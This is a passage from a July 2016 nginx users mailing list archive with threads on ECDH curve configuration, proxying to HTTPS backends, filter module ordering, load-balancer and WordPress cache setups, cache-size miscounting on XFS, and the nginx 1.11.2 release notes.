nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From florian at bottledsoftware.de Tue Jul 5 15:02:07 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Tue, 5 Jul 2016 17:02:07 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <20160705143948.GJ30781@mdounin.ru> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> Message-ID: <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> Thanks a lot for your suggestions. It is the same certificate on both servers and it is indeed a secp256r1 aka prime256v1 certificate. So does this mean, I have to use prime256v1 for ssl_ecdh_curve with this certificate? It?s still strange that it used to work before... Here is what the error log says: 2016/07/05 16:57:09 [info] 2525#2525: *115 SSL_do_handshake() failed (SSL: error:1408A0C1:SSL routines:ssl3_get_client_hello:no shared cipher) while SSL handshaking, client: 192.168.241.1, server: 0.0.0.0:443 Thanks again! > On 05 Jul 2016, at 16:39, Maxim Dounin wrote: > > Hello! > > On Tue, Jul 05, 2016 at 04:02:21PM +0200, Florian Reinhart wrote: > >> Hi Maxim! >> >> That?s what I thought. However, all clients can access the nginx server on the old Ubuntu 14.04 server, which uses the same config, >> >> I tested the following clients on OS X 10.11.5, all failed to connect: >> >> curl, installed from Homebrew: curl 7.49.1 (x86_64-apple-darwin15.5.0) libcurl/7.49.1 OpenSSL/1.0.2h zlib/1.2.5 nghttp2/1.12.0 >> Safari 9.1.1 (11601.6.17) >> Chrome 51.0.2704.106 >> Firefox 47.0.1 >> >> That?s why I don?t think it is a client issue. > > Yes, at least browsers are expected to support secp384r1, so it's > probably something different. > > Which certificate do you use? Is it the same as on the old > server? Such a situation can easily happen if the only > certificate available is ECDSA one and uses, e.g., prime256v1 (not > secp384r1), but only secp384r1 is enabled by the configuration. > > Looking into nginx error logs might also somewhat help to diagnose > what goes on here. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From project722 at gmail.com Tue Jul 5 15:05:14 2016 From: project722 at gmail.com (NdridCold .) Date: Tue, 5 Jul 2016 10:05:14 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: References: <1467728782092.71066@cscontract.com> <1467729702919.45075@cscontract.com> Message-ID: Yes, However I did not have the entire stanza un-commented out. I have done that, but now I am encountered with a different error message. Now I get: nginx: [emerg] host not found in upstream "resolveservergroup.com" in /etc/nginx/conf.d/default.conf:40 Here is my default.conf file: upstream backendservergroup.com { # Use ip hash for session persistance ip_hash; # backend server 1 server 192.168.155.120; # backend server 2 server 192.168.155.126; # backend server 3 server 192.168.155.127; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } server { listen 80; server_name nginxserver.com; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://backendservergroup.com; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name nginxserver.com; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://backendservergroup.com:443; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} On Tue, Jul 5, 2016 at 9:47 AM, Drew Turner wrote: > Yes that is in proxy_pass. Are you sure proxy_pass is defined in the > server stanza and that it's inside an include stanza? > > Posting the code would be helpful if you can redact the sensitive > information. > > On Tue, Jul 5, 2016 at 9:41 AM, Brian Pugh wrote: > >> Are you referring to the proxy pass declaration? If so I get an error >> when I uncomment that line out saying "nginx: [emerg] "proxy_pass" >> directive is not allowed here in /etc/nginx/conf.d/default.conf:40?" >> >> >> >> >> ------------------------------ >> *From:* nginx on behalf of Drew Turner < >> drew at drewnturner.com> >> *Sent:* Tuesday, July 5, 2016 9:33 AM >> *To:* nginx at nginx.org >> *Subject:* Re: does nginx forward requests to backend servers using http >> or https? >> >> You define what you want it sent to the backend as. So if you use >> http://backendserver it's http, if https://backendserver:443 - https. >> >> On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: >> >>> I am using the free version of nginx on RHEL 6.7. The version is : >>> >>> >>> nginx-1.10.1-1.el6.ngx.x86_64 >>> >>> >>> When using nginx as a load balancer I would like to know if nginx >>> forwards requests to backend servers using http or https?? >>> >>> >>> >>> >>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From reallfqq-nginx at yahoo.fr Tue Jul 5 16:06:32 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Tue, 5 Jul 2016 18:06:32 +0200 Subject: Order of execution of nginx filters In-Reply-To: <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> Message-ID: AFAIK you do not control the order of filters, and when you are building a filter, you deal with data on-the-fly, which means your filter might be invoked with a partial response coming from other filters. Moreover, the module needs to 'win' its selection on a specific event. I suggest you read some available literature (ex: http://www.evanmiller.org/nginx-modules-guide.html, specifically http://www.evanmiller.org/nginx-modules-guide.html#filters-body which seems to implement something close to what you wish). ?There is most probably more competent people to that matter who would give you better docs, but this is a head start I guess.? --- *B. R.* On Tue, Jul 5, 2016 at 6:06 AM, Raghavan, Gopal wrote: > Hi, > > > > I have the following three directives: > > > > location = /hello { > > hello_world; > > hola_mundo on; > > bonjour_monde on; > > } > > > > hello_world is an nginx handler module that provides content ?hello world? > > hola_mundo and bonjour_monde are filters that add to the chain strings > ?hola mundo? and ?bonjour monde? respectively. > > > > > > Here is the output: > > curl "http://localhost:8090/hello" > > hello worldhola mundobonjour monde > > > > > > Switching the filter directives in location block has no impact on output > string. > > > > For eg: > > > > location = /hello { > > hello_world; > > bonjour_monde on; > > hola_mundo on; > > } > > > > Here is the output: > > curl "http://localhost:8090/hello" > > hello worldhola mundobonjour monde > > > > > > How do I control the order of execution of filters? > > I already looked at objs/ngx_modules.c and auto/modules. My custom > handlers and filters are not listed there. > > > > One thing that I observed is that the order of listing the load_module > modules/*.so in conf/nginx.conf does impact the order of execution of the > filters. > > > > Is there any other trick to adjust the execution order within the location > block? > > > > Thanks, > > -- > > Gopal > > > > > > > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Tue Jul 5 16:11:48 2016 From: project722 at gmail.com (NdridCold .) Date: Tue, 5 Jul 2016 11:11:48 -0500 Subject: basic nginx setup help as load balancer Message-ID: I was getting a host not found problem while trying to start nginx. nginx: [emerg] host not found in upstream "backendservers.com" in /etc/nginx/conf.d/default.conf:37 I am fairly certain that this is because there is no name resolution for " backendservers.com" in our DNS. So I changed up a few things to make it work. But I am confused on a few concepts here. First of all, should my server name in the "upstream" directive be the same name in the "server_name" directive in the "server" stanza? Here is what I have so far: upstream myapplication.net { # Use ip hash for session persistance ip_hash; server 1.net; server 2.net; server 3..net; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } server { listen 80; server_name myapplication.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://myapplication.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name myapplication.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://myapplication.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php;# fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} So here is what I need to happen. I need nginx to asnwer requests for myapplication.net and send them to the servers "server1,net, server2.net, and server3.net". Am I accomplishing this with this config? And to recap, should my server name in the "upstream" directive be the same name in the "server_name" directive in the "server" stanza? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 5 16:22:32 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 19:22:32 +0300 Subject: nginx-1.11.2 Message-ID: <20160705162232.GO30781@mdounin.ru> Changes with nginx 1.11.2 05 Jul 2016 *) Change: now nginx always uses internal MD5 and SHA1 implementations; the --with-md5 and --with-sha1 configure options were canceled. *) Feature: variables support in the stream module. *) Feature: the ngx_stream_map_module. *) Feature: the ngx_stream_return_module. *) Feature: a port can be specified in the "proxy_bind", "fastcgi_bind", "memcached_bind", "scgi_bind", and "uwsgi_bind" directives. *) Feature: now nginx uses the IP_BIND_ADDRESS_NO_PORT socket option when available. *) Bugfix: a segmentation fault might occur in a worker process when using HTTP/2 and the "proxy_request_buffering" directive. *) Bugfix: the "Content-Length" request header line was always added to requests passed to backends, including requests without body, when using HTTP/2. *) Bugfix: "http request count is zero" alerts might appear in logs when using HTTP/2. *) Bugfix: unnecessary buffering might occur when using the "sub_filter" directive; the issue had appeared in 1.9.4. -- Maxim Dounin http://nginx.org/ From absolutely_free at libero.it Tue Jul 5 16:25:09 2016 From: absolutely_free at libero.it (absolutely_free at libero.it) Date: Tue, 5 Jul 2016 18:25:09 +0200 (CEST) Subject: cache issue with cms Message-ID: <2131669275.4018781467735909902.JavaMail.httpd@webmail-24.iol.local> Hi, I am using nginx version 1.10.1 with reverse proxy function toward Apache 2.2.15 I noticed that if I change something inside backend (eg. modify some text on some article), that changes appear on frontend, but I still view old post's content into backend. I tried to disable any caching mechanism for /wp-admin and /wp-login I hope I did this properly, can you help me in order to figure some errors with this configuration? This is my nginx global config: ####################################################user nginx nginx;worker_processes 4; error_log /var/log/nginx/error.log; events { worker_connections 1024;} http { include /etc/nginx/mime.types; default_type application/octet-stream; # Defines the cache log format, cache log location# and the main access log location. log_format cache '***$time_local ' '$upstream_cache_status ' 'Cache-Control: $upstream_http_cache_control ' 'Expires: $upstream_http_expires ' '$host ' '"$request" ($status) ' '"$http_user_agent" ' 'Args: $args ' 'Wordpress Auth Cookie: $wordpress_auth '; access_log /var/log/nginx/cache.log cache; access_log /var/log/nginx/access.log; # Proxy cache and temp configuration. proxy_cache_path /mnt/ramdisk/nginx_cache levels=1:2 keys_zone=main:10m max_size=1g inactive=30m; proxy_temp_path /mnt/ramdisk/nginx_temp; proxy_ignore_headers X-Accel-Expires Expires Cache-Control Set-Cookie; proxy_hide_header Pragma; proxy_hide_header Expires; proxy_hide_header Cache-Control; expires 1d; # Gzip Configuration. gzip_vary off; gzip on; gzip_disable msie6; gzip_static on; gzip_comp_level 4; gzip_proxied any; gzip_types text/plain text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript; upstream backend { ip_hash; server 127.0.0.1:8080; # IP goes here. } This is my nginx's virtual host config: server { listen xxxx.xxxx.xxx.xx:80; # IP goes here. server_name www.domain.com; # IP could go here. # Set proxy headers for the passthrough proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; # Let the Set-Cookie header through. proxy_pass_header Set-Cookie; # Max upload size: make sure this matches the php.ini in .htaccess client_max_body_size 8m; # Catch the wordpress cookies. # Must be set to blank first for when they don't exist. set $wordpress_auth ""; if ($http_cookie ~* "wordpress_logged_in_[^=]*=([^%]+)%7C") { set $wordpress_auth wordpress_logged_in_$1; } # Set the proxy cache key set $cache_key $scheme$host$uri$is_args$args; # All media (including uploaded) is under wp-content/ so# instead of caching the response from apache, we're just# going to use nginx to serve directly from there. location ~* ^/(wp-content|wp-includes)/(.*)\.(gif|jpg|jpeg|png|ico|bmp|js|css|pdf|doc)$ { root /home/domain.com; } # Don't cache these pages. location ~* ^/(wp-admin|wp-login.php){ proxy_pass http://backend; } location / { proxy_pass http://backend; proxy_cache main; proxy_cache_key $cache_key; proxy_cache_valid 30m; # 200, 301 and 302 will be cached. proxy_cache_use_stale error timeout invalid_header http_500 http_502 http_504 http_404; # 2 rules to dedicate the no caching rule for logged in users. proxy_cache_bypass $wordpress_auth; # Do not cache the response. proxy_no_cache $wordpress_auth; # Do not serve response from cache. proxy_buffers 8 2m; proxy_buffer_size 10m; proxy_busy_buffers_size 10m; } }} Thank you very much -------------- next part -------------- An HTML attachment was scrubbed... URL: From kworthington at gmail.com Tue Jul 5 18:01:44 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 5 Jul 2016 14:01:44 -0400 Subject: [nginx-announce] nginx-1.11.2 In-Reply-To: <20160705162237.GP30781@mdounin.ru> References: <20160705162237.GP30781@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.11.2 for Windows https://kevinworthington.com/nginxwin1112 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 5, 2016 at 12:22 PM, Maxim Dounin wrote: > Changes with nginx 1.11.2 05 Jul > 2016 > > *) Change: now nginx always uses internal MD5 and SHA1 implementations; > the --with-md5 and --with-sha1 configure options were canceled. > > *) Feature: variables support in the stream module. > > *) Feature: the ngx_stream_map_module. > > *) Feature: the ngx_stream_return_module. > > *) Feature: a port can be specified in the "proxy_bind", > "fastcgi_bind", > "memcached_bind", "scgi_bind", and "uwsgi_bind" directives. > > *) Feature: now nginx uses the IP_BIND_ADDRESS_NO_PORT socket option > when available. > > *) Bugfix: a segmentation fault might occur in a worker process when > using HTTP/2 and the "proxy_request_buffering" directive. > > *) Bugfix: the "Content-Length" request header line was always added to > requests passed to backends, including requests without body, when > using HTTP/2. > > *) Bugfix: "http request count is zero" alerts might appear in logs > when > using HTTP/2. > > *) Bugfix: unnecessary buffering might occur when using the > "sub_filter" > directive; the issue had appeared in 1.9.4. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 5 18:16:14 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 21:16:14 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> <20160705143948.GJ30781@mdounin.ru> <0084417C-DCEC-4581-99B1-30BDAEFCFF95@bottledsoftware.de> Message-ID: <20160705181614.GT30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 05:02:07PM +0200, Florian Reinhart wrote: > It is the same certificate on both servers and it is indeed a > secp256r1 aka prime256v1 certificate. So does this mean, I have > to use prime256v1 for ssl_ecdh_curve with this certificate? It?s > still strange that it used to work before... Since version 1.11.0 nginx uses the new SSL_CTX_set1_curves_list() interface if available to configure supported curves, instead of previously used EC_KEY_new_by_curve_name()/SSL_CTX_set_tmp_ecdh(). This new interface is generally better as it allows configuring multiple curves. I've just tested, and it looks like this new interface is also more strict. With previous interface it was possible to use any certificate regardless of the ssl_ecdh_curve setting, and that's why it worked for you in older versions. The new interface does not allow to use curves which are not listed at all, including certificates using these curves. Solution would be to list all curves you want to use, including curves used by certificates, e.g.: ssl_ecdh_curve secp384r1:prime256v1; Or, better yet, just leave the default ("auto"), it will allow most common curves as supported by OpenSSL. -- Maxim Dounin http://nginx.org/ From r at roze.lv Tue Jul 5 18:42:18 2016 From: r at roze.lv (Reinis Rozitis) Date: Tue, 5 Jul 2016 21:42:18 +0300 Subject: basic nginx setup help as load balancer In-Reply-To: References: Message-ID: <4C79A6BD1B674FCB933A438067B984E0@NeiRoze> > But I am confused on a few concepts here. First of all, should my server > name in the "upstream" directive be the same name in the "server_name" > directive in the "server" stanza? Here is what I have so far: > And to recap, should my server name in the "upstream" directive be the > same name in the "server_name" directive in the "server" stanza? It is not a requirement, but depending on how your backend servers are configured (if they are namebased virtualhosts) you may need to specify correct Host header. By default nginx sends whatever it is given in the proxy_pass directive. Taking your configuration for example: upstream myapplication.net { server 1.net; server 2.net; server 3..net; } location { proxy_pass http://myapplication.net; } 1. On startup Nginx will resolve the 1.net .. 3.net hostnames 2. Will send to whatever upstream server IP (not using the upstream hostsnames) it has chosen a request for 'myapplication.net' (Host). It also doesn't use server_name. If the backend has a namebased configuration and there is no 'myapplication'net' virtualhost (or it isnt the default one) the whole request will genereally fail (not return what was expected). If that is the case you either need to configure the upstream block (which for nginx is just a virtual name) and the proxy_pass to match your backend configuration or usually people just add additional header: location { proxy_pass http://myapplication.net; proxy_set_header Host $host; } This way nginx sends to backend the actual hostname from request. Of course you can use also $server_name (or any other variable http://nginx.org/en/docs/varindex.html or even static value) but usually server_name is something like .domain.com (for wildcard matching) so it may confuse the backend. rr From absolutely_free at libero.it Tue Jul 5 19:22:55 2016 From: absolutely_free at libero.it (absolutely_free at libero.it) Date: Tue, 5 Jul 2016 21:22:55 +0200 (CEST) Subject: very simple question about cache Message-ID: <544265138.4070811467746575919.JavaMail.httpd@webmail-24.iol.local> Hi,I set simply reverse proxy (backend is an Apache web server): upstream backend { ip_hash; server 127.0.0.1:8080; } server { listen x.y.w.z:80; # IP goes here. server_name somedomain.com; expires off; location / { proxy_pass http://backend; } real_ip_header X-Forwarded-For; # Set proxy headers for the passthrough proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; access_log /var/log/nginx/domain.cache.log cache; access_log /var/log/nginx/domain.access.log;} While browsing website, I see lots on entry in /var/log/nginx/domain.cache.log file (of course in /var/log/nginx/domain.access.log too).My question is: with this configuration, is there any caching active? Example of cache log: ***05/Jul/2016:21:15:59 +0200 - Cache-Control: - Expires: - some.domain.net "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore,customize-base,customize-loader,thickbox,plugin-instal&load%5B%5D=l,shortcode,media-upload,svg-painter,heartbeat,wp-auth-check,wp-a11y,wplink,jquery-ui-position,jquery-ui-menu,jquery-ui-autocomp&load%5B%5D=lete&ver=4.5.3 HTTP/1.1" (304) "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" Args: c=0&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore,customize-base,customize-loader,thickbox,plugin-instal&load%5B%5D=l,shortcode,media-upload,svg-painter,heartbeat,wp-auth-check,wp-a11y,wplink,jquery-ui-position,jquery-ui-menu,jquery-ui-autocomp&load%5B%5D=lete&ver=4.5.3 Wordpress Auth Cookie: ***05/Jul/2016:21:16:59 +0200 - Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT some.domain.net "POST /wp-admin/admin-ajax.php HTTP/1.1" (200) "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" Args: - Wordpress Auth Cookie: ***05/Jul/2016:21:18:59 +0200 - Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT some.domain.net "POST /wp-admin/admin-ajax.php HTTP/1.1" (200) "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" Args: - Wordpress Auth Cookie: -------------- next part -------------- An HTML attachment was scrubbed... URL: From giovani.rinaldi at azion.com Tue Jul 5 19:44:07 2016 From: giovani.rinaldi at azion.com (Giovani Rinaldi) Date: Tue, 5 Jul 2016 16:44:07 -0300 Subject: Cache calculating erroneous size Message-ID: Hello, I've been experiencing a rather strange situation regarding the cache size occupation (calculated by nginx's cache manager and reported in debug logs) versus the real occupied size as reported by `df`. Just exemplifying: - reported by cache manager: 76009.340M disk space used, 19458391 disk blocks (4K) used, 2583292 unique files in cache. - reported by df: 64203.512M of disk space used, 16436099 disk blocks (4K) used, 2583861 unique files in cache (this number is an approximation, due to find command taking more time to return). So, in resume, Nginx is counting files correctly, but not their sizes/blocks used (it is my understanding that it count blocks, not bytes). As a consequence, when the calculated cache size reaches the max_size defined in proxy_cache_path, forced evictions start occurring. I must point out that these evictions are due to max_size reached and not inactive time (I differentiate both of these cases in debug log messages) or file count watermark (related to keyzone capacity) being reached. Here's the configuration of my proxy cache: proxy_cache_path /xfs/http levels=1:2 keys_zone=smallfiles:800m > max_size=100g inactive=90d; > proxy_temp_path /tmp; > First I thought this could be related to allocsize in XFS ( https://trac.nginx.org/nginx/ticket/157), but the problem persists even when utilizing 4K instead of the default (64K). Also I must point out that there's another cache zone being utilized (also with XFS but in another disk) by the same nginx servers, though it is utilized for caching larger files (more than 1Mb in size in average), and it does not suffer from this cache size discrepancy. Restarting Nginx (or upgrading it) solves temporarily the problem, as the cache loader correctly calculates the total cache size. Thanks, -- Giovani Rinaldi -------------- next part -------------- An HTML attachment was scrubbed... URL: From drew at drewnturner.com Tue Jul 5 19:54:23 2016 From: drew at drewnturner.com (Drew Turner) Date: Tue, 5 Jul 2016 14:54:23 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: References: <1467728782092.71066@cscontract.com> <1467729702919.45075@cscontract.com> Message-ID: can you move the backend server declaration from your .conf file to the nginx.conf file inside the http stanza? On Tue, Jul 5, 2016 at 10:05 AM, NdridCold . wrote: > Yes, However I did not have the entire stanza un-commented out. I have > done that, but now I am encountered with a different error message. Now I > get: > > nginx: [emerg] host not found in upstream "resolveservergroup.com" in > /etc/nginx/conf.d/default.conf:40 > > Here is my default.conf file: > > upstream backendservergroup.com { > # Use ip hash for session persistance > ip_hash; > # backend server 1 > server 192.168.155.120; > # backend server 2 > server 192.168.155.126; > # backend server 3 > server 192.168.155.127; > > # The below only works on nginx plus > #sticky route $route_cookie $route_uri; > } > server { > > listen 80; > server_name nginxserver.com; > keepalive_timeout 70; > > #charset koi8-r; > #access_log /var/log/nginx/log/host.access.log main; > > location / { > root /usr/share/nginx/html; > index index.html index.htm; > } > > #error_page 404 /404.html; > > # redirect server error pages to the static page /50x.html > # > error_page 500 502 503 504 /50x.html; > location = /50x.html { > root /usr/share/nginx/html; > } > > # proxy the PHP scripts to Apache listening on 127.0.0.1:80 > # > location ~ \.php$ { > proxy_pass http://backendservergroup.com; > proxy_http_version 1.1; > proxy_set_header Connection ""; > } > > # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 > # > #location ~ \.php$ { > # root html; > # fastcgi_pass 127.0.0.1:9000; > # fastcgi_index index.php; > # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; > # include fastcgi_params; > #} > > # deny access to .htaccess files, if Apache's document root > # concurs with nginx's one > # > #location ~ /\.ht { > # deny all; > #} > } > > server { > > listen 443 ssl; > server_name nginxserver.com; > keepalive_timeout 70; > > #charset koi8-r; > #access_log /var/log/nginx/log/host.access.log main; > > location / { > root /usr/share/nginx/html; > index index.html index.htm; > } > > #error_page 404 /404.html; > > # redirect server error pages to the static page /50x.html > # > error_page 500 502 503 504 /50x.html; > location = /50x.html { > root /usr/share/nginx/html; > } > > # proxy the PHP scripts to Apache listening on 127.0.0.1:80 > # > location ~ \.php$ { > proxy_pass https://backendservergroup.com:443; > proxy_http_version 1.1; > proxy_set_header Connection ""; > } > > # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 > # > #location ~ \.php$ { > # root html; > # fastcgi_pass 127.0.0.1:9000; > # fastcgi_index index.php; > # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; > # include fastcgi_params; > #} > > # deny access to .htaccess files, if Apache's document root > # concurs with nginx's one > # > #location ~ /\.ht { > # deny all; > #} > > > > > On Tue, Jul 5, 2016 at 9:47 AM, Drew Turner wrote: > >> Yes that is in proxy_pass. Are you sure proxy_pass is defined in the >> server stanza and that it's inside an include stanza? >> >> Posting the code would be helpful if you can redact the sensitive >> information. >> >> On Tue, Jul 5, 2016 at 9:41 AM, Brian Pugh wrote: >> >>> Are you referring to the proxy pass declaration? If so I get an error >>> when I uncomment that line out saying "nginx: [emerg] "proxy_pass" >>> directive is not allowed here in /etc/nginx/conf.d/default.conf:40?" >>> >>> >>> >>> >>> ------------------------------ >>> *From:* nginx on behalf of Drew Turner < >>> drew at drewnturner.com> >>> *Sent:* Tuesday, July 5, 2016 9:33 AM >>> *To:* nginx at nginx.org >>> *Subject:* Re: does nginx forward requests to backend servers using >>> http or https? >>> >>> You define what you want it sent to the backend as. So if you use >>> http://backendserver it's http, if https://backendserver:443 - https. >>> >>> On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: >>> >>>> I am using the free version of nginx on RHEL 6.7. The version is : >>>> >>>> >>>> nginx-1.10.1-1.el6.ngx.x86_64 >>>> >>>> >>>> When using nginx as a load balancer I would like to know if nginx >>>> forwards requests to backend servers using http or https?? >>>> >>>> >>>> >>>> >>>> >>>> >>>> >>>> _______________________________________________ >>>> nginx mailing list >>>> nginx at nginx.org >>>> http://mailman.nginx.org/mailman/listinfo/nginx >>>> >>> >>> >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >>> >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From charles.orth at teamaol.com Tue Jul 5 21:00:03 2016 From: charles.orth at teamaol.com (Charles Orth) Date: Tue, 05 Jul 2016 17:00:03 -0400 Subject: How to leverage HTTP upstream features In-Reply-To: References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com> <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com> Message-ID: <577C1FD3.1040107@teamaol.com> Hi Gurus, I'm new to nginx... I would like to define upstream handler in HTTP without a HTTP server listener. From SMTP/POP3/IMAP I would like to use the upstream handler for my http endpoint. Thus requiring http_upstream initialize, create a request, hand the request off to upstream for processing and finally having HTTP upstream handler return the entire response to my handler. I haven't found any examples or patches where I can leverage HTTP upstream from Mail service perspective. Does anyone have a suggestion or an example? Thanks Charles From project722 at gmail.com Tue Jul 5 21:04:48 2016 From: project722 at gmail.com (NdridCold .) Date: Tue, 5 Jul 2016 